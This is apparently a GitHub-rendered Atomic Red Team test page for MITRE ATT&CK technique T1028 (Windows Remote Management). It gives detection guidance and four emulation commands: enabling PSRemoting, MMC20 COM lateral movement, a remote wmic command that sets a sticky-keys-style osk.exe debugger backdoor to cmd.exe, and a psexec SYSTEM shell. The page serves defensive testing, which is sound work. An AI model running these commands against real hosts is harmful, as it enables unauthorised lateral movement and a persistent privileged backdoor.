Skip to content

Latest commit

 

History

History
102 lines (68 loc) · 3.45 KB

T1028.md

File metadata and controls

102 lines (68 loc) · 3.45 KB

T1028 - Windows Remote Management

Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)

Detection: Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.

Platforms: Windows

Data Sources: File monitoring, Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring

Permissions Required: User, Administrator

System Requirements: WinRM listener turned on and configured on remote system

Remote Support: Yes

Atomic Tests


Atomic Test #1 - Enable Windows Remote Management

Powershell Enable WinRM

Supported Platforms: Windows

Run it with powershell!

powershell Enable-PSRemoting -Force


Atomic Test #2 - PowerShell Lateral Movement

Powershell lateral movement using the mmc20 application com object

Reference:

https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/

Supported Platforms: Windows

Inputs

Name Description Type Default Value
computername Name of Computer string computer1

Run it with command_prompt!

powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","${computername}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")


Atomic Test #3 - WMIC Process Call Create

Utilize WMIC to start remote process

Supported Platforms: Windows

Inputs

Name Description Type Default Value
user_name Username String DOMAIN\Administrator
password Password String P@ssw0rd1
computer_name Target Computer Name String Target

Run it with command_prompt!

wmic /user:${user_name} /password:${password} /node:${computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"


Atomic Test #4 - Psexec

Utilize psexec to start remote process

Supported Platforms: Windows

Inputs

Name Description Type Default Value
user_name Username String DOMAIN\Administrator
password Password String P@ssw0rd1
computer_name Target Computer Name String Target

Run it with command_prompt!

psexec \\host -u domain\user -p password -s cmd.exe